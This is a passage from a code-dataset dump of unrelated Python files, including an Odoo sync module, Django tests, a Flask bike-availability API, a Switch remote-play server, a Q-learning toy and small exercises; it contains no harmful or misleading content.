_logger.warn('hr.holidays._validate_fields')\n        return True\n\nclass base_synchro(models.TransientModel):\n    _inherit = 'base.synchro'\n    \n    base_sync_object_ids = fields.Many2many(comodel_name='base.synchro.obj', string='Create sync lines for')\n    \n    @api.one\n    def create_base_sync_lines(self):\n        server = odoorpc.ODOO(self.server_url.server_url, port=self.server_url.server_port)\n        server.login(self.server_url.server_db, self.server_url.login, self.server_url.password)\n        remote_model_data = server.env['ir.model.data']\n        for sync_obj in self.base_sync_object_ids:\n            _logger.warn(sync_obj)\n            domain = eval(sync_obj.domain)\n            _logger.warn(domain)\n            ids = self.pool.get(sync_obj.model_id.model).search(self._cr, self.env.user.id, domain, context=self.env.context)\n            _logger.warn(ids)\n            for external_id in self.env['ir.model.data'].search([('model', '=', sync_obj.model_id.model), ('res_id', 'in', ids)]):\n                id = remote_model_data.search([('model', '=', sync_obj.model_id.model), ('name', '=', external_id.name), ('module', '=', external_id.module)])\n                _logger.warn(id)\n                if id:\n                    remote_id = remote_model_data.browse(id).res_id\n                    _logger.warn(remote_id)\n                    if not self.env['base.synchro.obj.line'].search([('remote_id', '=', remote_id), ('local_id', '=', external_id.res_id), ('obj_id', '=', sync_obj.id)]):\n                        self.env['base.synchro.obj.line'].create({\n                            'remote_id': remote_id,\n                            'local_id': external_id.res_id,\n                            'obj_id': sync_obj.id,\n                            'name': '1900-01-01 00:00:00',\n                        })\n\n    @api.model\n    def _init_l10n_se_hr_payroll_separate(self):\n        \"\"\"Disable workflow init on hr.holidays.
Otherwise the workflow will corrupt synced data (the state field, and maybe more).\"\"\"\n        self.env.ref('hr_holidays.wkf_holidays').on_create = False\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"l10n_se_hr_payroll_separate/hr_payslip_run.py","file_name":"hr_payslip_run.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99084219","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django_hello_world.hello.models import Person, Request\n\n\nclass HelloTest(TestCase):\n    def test_home_view(self):\n        response = self.client.get(reverse('home'))\n        self.assertEqual(response.status_code, 200)\n\n        labels = (\n            '42 Coffee Cups',\n            'Name:',\n            'Last name:',\n            'Date of birth:',\n            'Bio:',\n            'Contacts:',\n            'Email:',\n            'Jabber:',\n            'Skype:',\n            'Other contacts:',\n        )\n        for label in labels:\n            self.assertContains(response, label)\n\n        person = Person.objects.get(pk=1)\n        self.assertContains(response, person.name)\n        self.assertContains(response, person.last_name)\n        self.assertContains(response,\n                            person.date_of_birth.strftime(\"%d-%m-%Y\"))\n        self.assertContains(response, person.bio)\n        self.assertContains(response, person.email)\n        self.assertContains(response, person.jabber)\n        self.assertContains(response, person.skype)\n        self.assertContains(response, person.other_contacts)\n\n    def test_model_person(self):\n        self.assertEqual(Person.objects.count(), 1)\n\n    def test_home_view_requests(self):\n        response = self.client.get(reverse('home'))\n        self.assertContains(response, 'requests')\n\n    def test_req_view(self):\n        response = self.client.get(reverse('requests'))\n        self.assertEqual(response.status_code, 200)\n\n    def test_request_middleware(self):\n        test_url = '/test/request/'\n        try:\n            self.client.get(test_url)\n        except:\n            pass\n\n        last_id = Request.objects.count()\n        last_req = Request.objects.get(pk=last_id)\n        self.assertEqual(last_req.path, test_url)\n\n    def test_context_processor_settings(self):\n        response = self.client.get(reverse('home'))\n        self.assertEqual(response.context['settings'].TIME_ZONE,\n                         settings.TIME_ZONE)\n        self.assertEqual(response.context['settings'].ROOT_URLCONF,\n                         settings.ROOT_URLCONF)\n\n    def test_login_page(self):\n        response = self.client.get(reverse('login'))\n        self.assertEqual(response.status_code, 200)\n\n    def test_edit_page(self):\n        # Anonymous access\n        response = self.client.get(reverse('edit'))\n        self.assertEqual(response.status_code, 302)  # 302 - Redirection\n\n        # Create test user and login\n        User.objects.create_user('testuser',\n                                 'test@test.com',\n                                 'testpassword')\n        self.client.login(username='testuser',\n                          password='testpassword')\n        response = self.client.get(reverse('edit'))\n        self.assertEqual(response.status_code, 200)\n\n        # Post new data\n        new_data = {'name': 'John',\n                    'last_name': 'Pupkin',\n                    'date_of_birth': '1991-07-08',\n                    'bio': 'Top Secret',\n                    'email': 'aaa@bbb.ccc',\n                    'jabber': 'xxx@yyy.zzz',\n                    'skype': 'pupkin',\n                    'other_contacts': '',}\n        response = self.client.post(reverse('edit'), new_data)\n        self.assertEqual(response.status_code, 302)  # 302 - Redirection\n\n        person = Person.objects.get(pk=1)\n        self.assertEqual(person.name, new_data['name'])\n        self.assertEqual(person.last_name, new_data['last_name'])\n        self.assertEqual(person.date_of_birth.strftime(\"%Y-%m-%d\"),\n                         new_data['date_of_birth'])\n        self.assertEqual(person.bio,
\n                         new_data['bio'])\n        self.assertEqual(person.email, new_data['email'])\n        self.assertEqual(person.jabber, new_data['jabber'])\n        self.assertEqual(person.skype, new_data['skype'])\n        self.assertEqual(person.other_contacts,\n                         new_data['other_contacts'])\n\n","sub_path":"django_hello_world/hello/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534829558","text":"from django.contrib import admin\n\nfrom .models import ContactoEmpresa, Empresa\n\nclass EmpresaAdmin(admin.ModelAdmin):\n\tlist_display = ('id', 'empresa', 'usuario')\n\tlist_filter = ('usuario', )\n\tsearch_fields = ('empresa',)\n\n\n\nadmin.site.register(ContactoEmpresa)\nadmin.site.register(Empresa, EmpresaAdmin)","sub_path":"empresas/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649669858","text":"\"\"\"\nConnected Components\n--------------------\nParts of the graph that are connected, but disjoint from other parts of the\ngraph.\n\nTo count connected components:\n    For each node:\n        if node not visited:\n            traverse from that node\n            increment counter\n\n\"\"\"\n\n\n\ndef get_neighbors(row, col, matrix):\n    neighbors = []\n    \n    if row > 0 and matrix[row - 1][col] == 1:\n        neighbors.append((row - 1, col))\n    if row < len(matrix) - 1 and matrix[row + 1][col] == 1:\n        neighbors.append((row + 1, col))\n    if col > 0 and matrix[row][col - 1] == 1:\n        neighbors.append((row, col - 1))\n    if col < len(matrix[0]) - 1 and matrix[row][col + 1] == 1:\n        neighbors.append((row, col + 1))\n\n    return neighbors\n\ndef dft(row, col, matrix, visited):\n    s = []\n    s.append((row, col))\n\n    while len(s) > 0:\n        row, col = s.pop()\n\n        if visited[row][col] == False:\n            visited[row][col] = True\n\n            for neighbor in get_neighbors(row, col, matrix):\n                s.append(neighbor)\n\n\nmatrix = [[0, 1, 0, 1, 0],\n          [1, 1, 0, 1, 1],\n          [0, 0, 1, 0, 0],\n          [0, 0, 1, 0, 0],\n          [1, 1, 0, 0, 0]]\n\nisland_count = 0\n\nvisited = []\n\nfor _ in range(len(matrix)):\n    visited.append([False] * len(matrix[0]))\n\nfor row in range(len(matrix)):\n    for col in range(len(matrix[row])):\n        if visited[row][col] == False:\n            if matrix[row][col] == 1:\n                dft(row, col, matrix, visited)\n\n                island_count += 1\n\nprint(island_count)\n\nimport random\n\nclass Graph:\n\n    def populate_graph(self, num_users, avg_friendships):\n        # Reset graph\n        self.last_id = 0\n        self.users = {}\n        self.friendships = {}\n\n        # Add users\n        for i in range(0, num_users):\n            self.add_user(f\"User {i}\")\n\n        # Create Friendships\n        # Generate all possible friendship combinations\n        possible_friendships = []\n\n        # Avoid duplicates by ensuring the first number is smaller than the second\n        for user_id in self.users:\n            for friend_id in range(user_id + 1, self.last_id + 1):\n                possible_friendships.append((user_id, friend_id))\n\n        # Shuffle the possible friendships\n        random.shuffle(possible_friendships)\n\n        # Create friendships for the first X pairs of the list\n        # X is determined by the formula: num_users * avg_friendships // 2\n        # Need to divide by 2 since each add_friendship() creates 2 friendships\n        for i in range(num_users * avg_friendships // 2):\n            friendship = possible_friendships[i]\n            self.add_friendship(friendship[0], friendship[1])\n\n    def add_user(self, user_name):\n        pass\n\n    def add_friendship(self, user_id, friend_id):\n
pass","sub_path":"class/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526875190","text":"from subprocess import call\n\nimport traceback\nimport logging\n\nclass IRSend():\n @staticmethod\n def withRemote(remoteName):\n return IRSend(remoteName)\n \n def __init__(self, remoteName):\n self.remoteName = remoteName\n\n def once(self, buttonName):\n try:\n logging.info(\"Sending %s with remote %d once.\", buttonName, self.remoteName)\n call([\"irsend\", \"SEND_ONCE\", self.remoteName, buttonName])\n except Exception as e:\n logging.error(\"An error occured.\")\n logging.error(traceback.format_exc())\n","sub_path":"devices/actions/irsend.py","file_name":"irsend.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427352885","text":"import os\nimport urllib\nfrom datetime import datetime, timedelta\nfrom flask import Flask, render_template, jsonify\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport numpy as np\nfrom flask_cache import Cache\n\ndef get_db():\n db_path = os.path.dirname(__file__) + \"/db/\"\n db_name = \"dublin_bikes.db\"\n if not os.path.isfile(db_path + db_name):\n print(\"dublin_bikes.db not found, retrieving from backup...\")\n db_url = \"https://s3-eu-west-1.amazonaws.com/bmxbandits/dublin_bikes.db\"\n urllib.request.urlretrieve(db_url, db_path + db_name)\n return create_engine(\"sqlite:///\" + db_path + db_name)\n\napp = Flask(__name__)\n\n# Development\nif __name__ == '__main__':\n cache_config = {\n 'CACHE_TYPE' : 'simple'\n }\nelse:\n # Production\n cache_config = {\n 'CACHE_TYPE' : 'redis',\n 'CACHE_KEY_PREFIX' : 'bmxcache',\n 'CACHE_REDIS_HOST' : 'bmxbanditsredis.goe8i6.0001.euw2.cache.amazonaws.com',\n 'CACHE_REDIS_PORT': '6379',\n 'CACHE_REDIS_URL': 'redis://bmxbanditsredis.goe8i6.0001.euw2.cache.amazonaws.com:6379'\n }\n\napp.cache = Cache(app, config=cache_config)\nengine = get_db()\n@app.route('/')\ndef show_json():\n return render_template('index.html', lat=53.345937, lng=-6.2626352, zoom=14)\n\n# Markers\n@app.route(\"/stat\")\n@app.cache.cached()\ndef get_all_static():\n sql = \"select * from static;\"\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Markers Availability\n@app.route(\"/dyn\")\n@app.cache.cached(timeout=300)\ndef get_all_dynamic():\n sql = \"SELECT * FROM ( SELECT number, \" \\\n \"MAX(last_update) AS max_update FROM dynamic GROUP BY number) AS n \"\\\n \"INNER JOIN dynamic AS d \" \\\n \"ON d.number = n.number \" \\\n \"AND d.last_update = n.max_update;\"\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Marker Static Info\n@app.route(\"/stat/\")\ndef get_one_static(number):\n sql = \"select * from static where number = {};\".format(number)\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Marker Dynamic Info\n@app.route(\"/dyn/\")\n@app.cache.memoize(timeout=300)\ndef get_one_dynamic(stn_no):\n sql = \"SELECT d1.* FROM dynamic d1 \"\\\n \"INNER JOIN (\"\\\n \"SELECT number, MAX(last_update) max_update \"\\\n \"FROM dynamic \"\\\n \"WHERE number = {} ) d2 \"\\\n \"ON d1.last_update = d2.max_update \" \\\n \"AND d1.number = d2.number;\".format(stn_no)\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) 
for row in rows])\n\n@app.cache.memoize(timeout=1800)\ndef get_dataframe_base(number=None):\n    dt = datetime.today()\n    ts = int((dt - (timedelta(days=21))).timestamp() * 1000)\n    query = \"select number, available_bike_stands,available_bikes, last_update from dynamic where last_update > {}\".format(ts)\n    if number is not None:\n        query += \" and number = {}\".format(number)\n    df = pd.read_sql_query(query, engine)\n    df['last_update_date'] = pd.to_datetime(df.last_update, unit=\"ms\")\n    df.set_index('last_update_date', inplace=True)\n    df.drop('last_update', axis=1, inplace=True)\n    return df\n\n# Closest Stations\n@app.route(\"/distance/<int:origin>/<int:day>/<int:hour>\")\n@app.cache.memoize(timeout=1800)\ndef get_distance(origin, day, hour):\n    # Wraparound at midnight/end of week\n    hour += 1\n    if hour == 24:\n        day += 1\n        if day == 7:\n            day = 0\n        hour = 0\n\n    sql_dist = \"select dest, dist from distance where origin = {};\".format(origin)\n    rows_dist = engine.execute(sql_dist).fetchall()\n    df = get_dataframe_base()\n    df = df.loc[(df.index.weekday == day) & (df.index.hour == hour), ['number', 'available_bike_stands', 'available_bikes']]\n    weekday_count = df.groupby(['number']).agg(np.mean)\n    avail_dict = weekday_count.to_dict(orient=\"index\")\n    for row in rows_dist:\n        avail_dict[row[0]][\"distance\"] = row[1]\n    avail_dict.pop(origin)\n    return jsonify(distance=[(int(key), value) for key, value in avail_dict.items()])\n\n\n# Availability Chart\n@app.route(\"/weekday/<int:number>/<int:weekday>\")\n@app.cache.memoize(timeout=1800)\ndef get_station_stats_by_day(number, weekday):\n    df = get_dataframe_base(number)\n    df = df.loc[df.index.weekday == weekday, ['available_bike_stands', 'available_bikes']]\n    df['group'] = df.index.hour\n    weekday_count = df.groupby(['group']).agg(np.mean)\n    return weekday_count.round().to_json(orient=\"records\")\n\n\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"dublin_flask/bikes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285565074","text":"import sys\nimport time\n\ntry:\n    from IPython.core.display import clear_output\n    have_ipython = True\nexcept ImportError:\n    have_ipython = False\n\n\nclass Waitbar(object):\n    \n    def __init__(self, use_eta=False,totalWidth=77):\n        self.progBar = \"[]\"   # This holds the progress bar string\n        self.min = 0.0\n        self.max = 1.0\n        self.span = self.max-self.min\n        self.width = totalWidth\n        \n        self.display_eta=True\n        \n        self.amount = 0       # When amount == max, we are 100% done \n        self.update(0)        # Build progress bar string\n\n        self.initial_time=time.time()\n\n        if have_ipython:\n            self.display = self.display_ipython\n        else:\n            self.display = self.display_noipython\n    \n    \n    def update(self, newAmount = 0):\n        if newAmount < self.min: newAmount = self.min\n        if newAmount > self.max: newAmount = self.max\n        self.amount = newAmount\n\n        # Figure out the new percent done, round to an integer\n        diffFromMin = float(self.amount - self.min)\n        percentDone = (diffFromMin / float(self.span)) * 100.0\n        \n        if self.display_eta:\n            if percentDone==0.0:\n                eta_str=' (ETA: ??)'\n            else:\n                dt=time.time()-self.initial_time\n                \n                eta=dt/percentDone*(100-percentDone)\n                \n                seconds=eta%60\n                eta=int(eta/60)\n                minutes=eta%60\n                eta=int(eta/60)\n                hours=eta%24\n                eta=int(eta/24)\n                days=eta\n                \n                eta_str=' (ETA: '\n                if days:\n                    eta_str+=str(days)+\" d \"\n                if hours:\n                    eta_str+=str(hours)+\" h \"\n                if minutes:\n                    eta_str+=str(minutes)+\" m \"\n                eta_str+='%.1f s)' % seconds\n                \n                \n        else:\n
            eta_str=''\n        \n        percentDone = round(percentDone)\n        percentDone = int(percentDone)\n\n        done_str=str(percentDone)+\"%\" +eta_str\n        \n        \n        \n        \n        # Figure out how many hash bars the percentage should be\n        allFull = self.width - 2\n        numHashes = (percentDone / 100.0) * allFull\n        numHashes = int(round(numHashes))\n\n        # build a progress bar with hashes and spaces\n        self.progBar = \"[\" + '#'*numHashes + ' '*(allFull-numHashes) + \"]\"\n\n        # figure out where to put the percentage, roughly centered\n        percentPlace = (len(self.progBar) // 2) - len(done_str)//2 \n        percentString = done_str\n\n        # slice the percentage into the bar\n        self.progBar = self.progBar[0:percentPlace] + percentString + self.progBar[percentPlace+len(percentString):]\n\n    \n    def display_ipython(self):\n        try:\n            clear_output()\n        except Exception:\n            # terminal IPython has no clear_output\n            pass\n\n        print( '\\r',self,end=\"\")\n        sys.stdout.flush()\n        time.sleep(0.001)\n\n    def display_noipython(self):\n        print( '\\r',self,end=\"\")\n        sys.stdout.flush()\n    \n    def updated(self,newAmount=0):\n        self.update(newAmount)\n        self.display()\n    \n    \n    def __str__(self):\n        return str(self.progBar)\n\n\nif __name__==\"__main__\":\n    import time\n    w = Waitbar(False)\n    for i in range(1000):\n        w.update(i/1000.0)\n        print(w,end=\"\")\n        time.sleep(.01)\n    \n","sub_path":"plasticnet/Waitbar.py","file_name":"Waitbar.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269421767","text":"#python3\n\nclass TreeNode:\n    def __init__(self,x):\n        self.val = x\n        self.left = None\n        self.right = None\n\nclass Solution:\n    def __init__(self):\n        self.sum = 0\n    def sumOfLeftLeaves(self,root) -> int:\n        if root == None:\n            return 0\n        if (root.left != None and root.left.left == None and root.left.right == None):\n            self.sum += root.left.val\n        self.sumOfLeftLeaves(root.left)\n        self.sumOfLeftLeaves(root.right)\n        return self.sum\n\nif __name__ == \"__main__\":\n    s = Solution()\n    t1 = TreeNode(1)\n    t2 = TreeNode(2)\n    t3 = TreeNode(3)\n    t1.right = t2\n    t1.left = t3\n    print(s.sumOfLeftLeaves(t1))","sub_path":"leetcode/SumOfLeftLeaves.py","file_name":"SumOfLeftLeaves.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"553926687","text":"import argparse\nimport asyncio\nimport logging\nimport os\nfrom typing import Optional\n\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom flask_socketio import send\n\nfrom switchremoteplay.controller import SwitchController\n\n# Follow the example at https://flask-socketio.readthedocs.io/en/latest/\n\nlogger = logging.getLogger('switchremoteplay')\n\napp = Flask(__name__, static_folder='../../switch-rp-client/build', static_url_path='/')\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or 'asdasdasdf'\nsocketio = SocketIO(app, cors_allowed_origins='*')\n\ncontroller: Optional[SwitchController] = None\n\n@app.route('/')\ndef my_index():\n    return app.send_static_file('index.html')\n\n@socketio.on('connect')\ndef test_connect():\n\tprint(\"Connected\")\n\tsend({'connected': True}, json=True)\n\n\n@socketio.on('disconnect')\ndef test_disconnect():\n\tprint(\"Disconnected\")\n\n\n# Handle unnamed events.\n@socketio.on('message')\ndef handle_message(message):\n\tprint(\"received message: \" + message)\n\n\n# Handle unnamed events with JSON.\n@socketio.on('json')\ndef handle_json(json):\n\tprint(\"received json: \" +
str(json))\n\n\n@socketio.on('p')\ndef handle_press(command):\n\tlogger.debug(\"Got command: `%s`\", command)\n\tcontroller.run(command)\n\treturn \"DONE `{}`\".format(command)\n\n\nasync def _main():\n\tlogger.info(\"Starting\")\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-r', '--switch_mac_address', type=str, default=None,\n\t\t\t\t\t\thelp=\"The Switch console's MAC address. Specify this if you've already paired a Switch console to your server device.\")\n\n\targs = parser.parse_args()\n\tswitch_mac_address = args.switch_mac_address\n\n\tglobal controller\n\ttry:\n\t\tcontroller = await SwitchController.get_controller(logger, switch_mac_address)\n\t\tstart_server()\n\t\t# Keep the server running.\n\t\t# There must be a better way to do this but this seems to work fine for now.\n\t\twhile True:\n\t\t\tawait asyncio.sleep(60)\n\tfinally:\n\t\tlogger.info('Stopping the service...')\n\n\ndef start_server():\n\thost = '0.0.0.0'\n\t# 5000 is the default port.\n\tport = 5000\n\t# port = 48668\n\tprint(\"Running at {}:{}\".format(host, port))\n\n\tl = asyncio.get_running_loop()\n\n\tdef _start():\n\t\tasyncio.set_event_loop(l)\n\t\tsocketio.run(app, host, port)\n\n\tl.run_in_executor(None, _start)\n\n\nif __name__ == '__main__':\n\tlogger.setLevel(logging.INFO)\n\tloop = asyncio.get_event_loop()\n\tloop.run_until_complete(\n\t\t_main()\n\t)\n\tprint(\"done\")\n","sub_path":"server/switchremoteplay/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414403898","text":"times=int(input())\nfor i in range(times):\n    n=int(input())\n    line1=input().split()\n    line1=[int(x) for x in line1]\n    answer=0\n    for i in range(n-1):\n        for j in range(i+1,n):\n            if line1[i]==line1[j]:\n                answer+=1\n    print(answer)","sub_path":"Code/CodeRecords/2677/60677/261471.py","file_name":"261471.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379311692","text":"# This is a script to take the landmark coordinates\n# from an Oak object and make a csv file with\n# x, y coordinates organized just as they are in\n# the tutorial\n\nfrom plot_points import get_scale\nfrom numpy.lib.function_base import append\nimport pandas as pd\nimport oaks\nimport random\n\n\ndef main():\n\n    # making the dictionary that holds the oak objects\n    num_images = 230\n    oak_dict = {}\n    for i in range(num_images):\n        currentOak = oaks.makeOaks(i)\n        oak_dict[i] = currentOak\n\n    # Now, have to extract coordinates and place\n    # x and y in separate columns, then put into dataframe\n    data_list = []\n    \"\"\"\n    # test the shuffling of the veins\n    currOak = oaks.makeOaks(0)\n    veins = currOak.minor_secondary\n\n    v_list = list(veins.items())\n    #print(\"List not shuffled:\", v_list)\n    random.shuffle(v_list)\n    #print(\"Shuffled list:\", v_list)\n    v_shuf = dict(v_list)\n    # print(v_shuf)\n    \"\"\"\n\n    landmark_list = ['blade_tip', 'petiole_blade', 'petiole_tip']\n    for i in oak_dict:\n        # create empty list\n        points_list = []\n        # instantiate variable with current Oak object\n        myOak = oak_dict[i]\n        # retrieve image name of current Oak\n        name = myOak.file_name\n        # add image name to the points list\n        points_list.append(name)\n        # add all points to points list of specified landmark\n        for j in landmark_list:\n            points_list = extract_point(\n                myOak, j, points_list, to_scale=True)\n\n        # contain the points for all of the Oak images (row layout sketched below)\n\n
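        # A hedged illustration (added, not part of the original script): with the
        # three landmarks above and, by assumption, one (x, y) point per landmark,
        # each row built here has the shape [file_name, x0, y0, x1, y1, x2, y2] --
        # one filename column plus 3*2 coordinate columns, matching the 7-column
        # col_list built below. Hypothetical values:
        _example_row = ['leaf_000.jpg', 12, 34, 56, 78, 90, 11]  # illustrative only, unused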
        data_list.append(points_list)\n\n    # make the columns for the dataframe, length\n    # depends on how many, and which, landmarks are\n    # being used\n    col_list = ['']\n    for i in range(6):\n        col_list.append(i)\n\n    # make list of columns that need to be dropped\n    # for each image to have the same number of keypoints\n    # only necessary if doing lobe tips, sinuses, or veins\n    cols_to_drop = []\n    for j in range(9, 39):\n        cols_to_drop.append(j)\n\n    df = pd.DataFrame(data_list, columns=col_list)\n    # print(df)\n    df.to_csv(\n        'three_points_training_not_shuffled.csv', index=False)\n\n    random.shuffle(data_list)\n    all_df = pd.DataFrame(data_list, columns=col_list)\n    # print(all_df)\n    all_df.to_csv(\n        'three_points_training_shuffled.csv', index=False)\n\n    min_df = pd.DataFrame(data_list, columns=col_list)\n    #min_df.drop(min_df.columns[cols_to_drop], axis=1, inplace=True)\n    # min_df.to_csv(\n    #     'sinus_training_min_points_shuffled.csv', index=False)\n\n\ndef extract_point(oak, landmark, points, to_scale):\n    point_list = points\n    # get the landmark attribute that we are looking for\n    lm = getattr(oak, landmark)\n    # turn dict items into list\n    lm_list = list(lm.items())\n    # shuffle list items\n    random.shuffle(lm_list)\n    # convert back to dict\n    landmark_dict = dict(lm_list)\n    if to_scale:\n        scale = get_scale(oak)\n        for i in landmark_dict:\n            point_list.append(int(landmark_dict[i][0] / scale))\n            point_list.append(int(landmark_dict[i][1] / scale))\n    else:\n        for j in landmark_dict:\n            point_list.append(landmark_dict[j][0])\n            point_list.append(landmark_dict[j][1])\n    return point_list\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"scripts/make_table_keypoint.py","file_name":"make_table_keypoint.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417481400","text":"#!/usr/bin/env python3\r\n\r\n'''\r\nCreated on 18.03.2013\r\n\r\n@author: soeren\r\n'''\r\n\r\nimport sys\r\nimport pickle\r\n# from importlib import import_module\r\nfrom socketserver import BaseRequestHandler, ThreadingMixIn, UDPServer\r\n\r\nfrom PyQt4.QtCore import QCoreApplication\r\n\r\n# from core.card import CardDeck, Card\r\nfrom core.game_host import NetworkGameHost\r\nfrom core.net.udp_service import UdpService\r\n\r\n\r\nclass PyDurakUdpServerHandler(BaseRequestHandler):\r\n    \r\n    game_host = None\r\n\r\n    \r\n    def handle(self):\r\n        data = self.request[0].strip()\r\n        socket = self.request[1]\r\n        print (\"[{0}] broadcast request: {1}\".format(self.client_address[0], data.decode()))\r\n        game_list = {\"Spiel A\":55561, \"Spiel B\":55562}\r\n        socket.sendto(pickle.dumps(game_list), self.client_address)\r\n\r\n\r\n\r\nclass PyDurakServer(object):\r\n    '''\r\n    The PyDurakServer manages a game host and a udp module to get server/game information.\r\n    '''\r\n    \r\n    def __init__(self):\r\n        print(\"\\n=======================\\n=== PyDurak Server\\n=======================\")\r\n        \r\n    def startUI(self):\r\n        print(\"UI mode not implemented yet!\")\r\n        #mainWindow = import_module(\"server.ui.server_window\").ServerWindow()\r\n        #mainWindow.show()\r\n        self.__run()\r\n        \r\n    def startConsole(self):\r\n        self.__server_app = QCoreApplication(sys.argv)\r\n        self.__game_host = NetworkGameHost()\r\n        self.__run()\r\n        \r\n    def setup_udp_service(self):\r\n        self.__identification_service = UdpService()\r\n        \r\n        handler = PyDurakUdpServerHandler\r\n        handler.game_host = self.__game_host\r\n        self.__identification_service.publish(55560, handler)\r\n        \r\n        print(\"UDP Service
published on port 55560\")\r\n\r\n    def __run(self):\r\n        self.setup_udp_service()\r\n        sys.exit(self.__server_app.exec_())\r\n        \r\n    def quit(self):\r\n        self.__server_app.quit()\r\n    ","sub_path":"pydurak/server/pydurak_server.py","file_name":"pydurak_server.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580443041","text":"import numpy as np\nimport pandas as pd\nimport time\n\n# Seed the random number generator\nnp.random.seed(2)\n\n# Global constants (fixed properties)\nN_STATES=6 # distance from the start to the terminal\nACTIONS=['left','right'] # actions the agent is allowed to take: left or right\nEPSILON=0.9 # epsilon-greedy policy parameter\nALPHA=0.1 # learning rate\nLAMBDA=0.9 # discount factor for future rewards\nMAX_EPISODES=13 # maximum number of training episodes\nFRESH_TIME=0.3 # time spent per step\n\n# Initialize and build the Q-table\ndef build_q_table(n_states,actions):\n    # Create a table with one row per state (start-to-terminal distance) and one column per allowed action\n    table=pd.DataFrame(np.zeros((n_states,len(actions))),columns=actions)\n    return table\n\n# build_q_table(N_STATES,ACTIONS)\n\n# Initialize the agent's action selection\n# Choose the next action based on the current state and the Q-table values\ndef choose_action(state,q_table):\n    # Select the Q-table row for this state\n    state_actions=q_table.iloc[state,:]\n    # When the random draw exceeds 0.9, or the whole Q-table row is 0, pick left or right at random\n    if (np.random.uniform()>EPSILON) or (state_actions.all()==0):\n        action_name=np.random.choice(ACTIONS)\n    else:\n        # Otherwise pick the action with the larger Q-value\n        action_name=state_actions.argmax()\n    return action_name\n\n# Initialize the environment feedback\ndef get_env_feedback(S,A):\n    if A=='right':\n        if S==N_STATES-2:\n            S_='terminal'\n            R=1\n        else:\n            S_=S+1\n            R=0\n    else:\n        R=0\n        if S==0:\n            S_=S\n        else:\n            S_=S-1\n    return S_,R\n\n# Initialize the environment display\ndef update_env(S,episode,step_counter):\n    env_list=['-']*(N_STATES-1)+['T']\n    if S=='terminal':\n        interaction='Episode %s: total_steps=%s'%(episode+1,step_counter)\n        print('\\r{}'.format(interaction),end='')\n        time.sleep(2)\n        print('\\r ',end=\"\")\n    else:\n        env_list[S]='o'\n        interaction=''.join(env_list)\n        print('\\r{}'.format(interaction),end=\"\")\n        time.sleep(FRESH_TIME)\n\n# Main training loop\ndef rl():\n    q_table=build_q_table(N_STATES,ACTIONS)\n    for episode in range(MAX_EPISODES):\n        step_counter=0\n        S=0\n        is_terminated=False\n        update_env(S,episode,step_counter)\n        while not is_terminated:\n            A=choose_action(S,q_table)\n            S_,R=get_env_feedback(S,A)\n            q_predict=q_table.loc[S,A]\n            if S_!='terminal':\n                q_target=R+LAMBDA*q_table.iloc[S_,:].max()\n            else:\n                q_target=R\n                is_terminated=True\n            q_table.loc[S,A]=q_table.loc[S,A]+ALPHA*(q_target-q_predict)\n            S=S_\n            update_env(S,episode,step_counter+1)\n            step_counter=step_counter+1\n    return q_table\n\nif __name__ == \"__main__\":\n    q_table=rl()\n    print('\\r\\nQ-table:\\n')\n    print(q_table)\n","sub_path":"jupyter项目/强化学习/Q_Learning.py","file_name":"Q_Learning.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"109969782","text":"import datetime\nimport csv\n\nimport numpy as np\nimport pylab as pl\nfrom matplotlib import finance\nfrom matplotlib.collections import LineCollection\n\nfrom sklearn import cluster, covariance, manifold\n\n\nimport matplotlib.pyplot as plt\n\n\n\ndef trimMatix(matrix):\n\tlengths = []\n\tfor i in matrix:\n\t\tlengths.append(len(i))\n\tminLength = min(lengths)\n\timport pdb; pdb.set_trace()\n\ttrimmedQuotes = matrix[:][minLength]\n\treturn trimmedQuotes\n\ndef getDates():\n\td1 = 